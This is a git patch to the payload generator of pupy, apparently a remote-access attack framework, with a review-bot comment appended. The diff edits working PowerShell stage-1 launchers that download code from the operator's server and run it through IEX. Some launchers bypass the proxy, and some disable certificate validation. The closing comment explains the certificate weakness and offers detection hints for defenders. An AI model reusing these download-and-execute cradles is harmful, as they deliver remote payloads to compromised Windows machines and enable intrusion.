From 98565a75ae85a7dd3d31a7e4549a3e21b05e5762 Mon Sep 17 00:00:00 2001
From: Dc3
Date: Sat, 11 Mar 2017 02:43:04 +0800
Subject: [PATCH] Fixed something,Add powershell exec using -Enc
---
 pupy/pupylib/payloads/ps1_oneliner.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/pupy/pupylib/payloads/ps1_oneliner.py b/pupy/pupylib/payloads/ps1_oneliner.py
index 3c0440df..1bc28221 100644
--- a/pupy/pupylib/payloads/ps1_oneliner.py
+++ b/pupy/pupylib/payloads/ps1_oneliner.py
@@ -92,16 +92,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
 self.end_headers()
 if self.server.useTargetProxy == True:
 print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
- if not self.ssl:
+ if not self.server.ssl:
 launcher = "IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
 else:
- launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
+ launcher = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
 else:
 print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
- if not self.ssl:
+ if not self.server.ssl:
 launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
 else:
- launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('http://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
+ launcher = "$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('https://%s:%s/%s');"%(self.server.link_ip,self.server.link_port,url_random_two)
 launcher = create_ps_command(launcher, force_ps32=True, nothidden=False)
 self.wfile.write(launcher)
 print colorize("[+] ","green")+"[Stage 1/2] Powershell script served !"
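Review bot: Both `else:` branches that now emit `https://` still prepend `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}`, so the stage download is encrypted but the server certificate is never verified. That callback is a process-wide static, so validation stays off for every later request in the same PowerShell process. This is worth stating next to the `if not self.server.ssl:` checks, e.g. `# ssl only encrypts the stage fetch; certificate validation is disabled in the launcher`. For readers on the detection side, the served text keeps the same shape (`DownloadString` passed to `IEX` plus the validation-callback override), and script block logging records it as executed even if it was delivered encoded. The subject line mentions `-Enc`, but this hunk leaves the `create_ps_command` call untouched, and the enclosing method starts and ends outside the hunk.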